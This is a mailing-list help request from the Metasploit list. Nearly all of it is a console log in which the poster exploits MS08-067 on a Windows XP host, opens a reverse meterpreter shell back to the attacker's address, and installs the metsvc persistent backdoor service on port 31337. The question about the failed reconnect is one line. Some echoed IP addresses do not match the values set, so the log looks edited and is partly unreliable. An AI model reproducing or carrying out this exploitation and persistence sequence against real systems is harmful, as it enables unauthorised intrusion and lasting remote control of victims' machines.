Metasploit mailing list archives

Help!!! Problem with metsvc!!!


From: Makler <maggov () mail ru>
Date: Thu, 3 Feb 2011 21:04:33 +1100




                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 661 exploits - 367 auxiliary
+ -- --=[ 302 payloads - 27 encoders - 8 nops
       =[ svn r11702 updated today (2011.02.02)

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 10.0.0.1
LHOST => 10.0.9.112
msf exploit(ms08_067_netapi) > set LPORT 6550
LPORT => 6550
msf exploit(ms08_067_netapi) > set rhost 10.1.1.10
rhost => 10.35.26.215
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.0.0.1:6550
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Russian
[*] Selected Target: Windows XP SP2 Russian (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 10.1.1.10
[*] Meterpreter session 1 opened (10.0.0.1:6550 -> 10.1.1.10:1031) at 2011-02-03 20:33:39 +1100

meterpreter > run metsvc -A
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\CdJGQjHGsYjqX...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

[*] Trying to connect to the Meterpreter service at 10.1.1.10:31337...

meterpreter > background
msf exploit(ms08_067_netapi) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set lport 31337
lport => 31337
msf exploit(handler) > set rhost 10.1.1.10
rhost => 10.1.1.10
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler

[*] Starting the payload handler...

-----------

Starting Nmap 5.00 ( http://nmap.org ) at 2011-02-03 20:36 MAGT
Interesting ports on amd.maglan.local (10.1.1.10):
Not shown: 996 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
31337/tcp open  Elite
-----------

[*] exec: netstat |grep 31337

tcp        0      0 10.0.9.112:46256            10.1.1.10:31337      ESTABLISHED

And that's all ... session in MSF does not open ...
someone has decided this issue?





_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: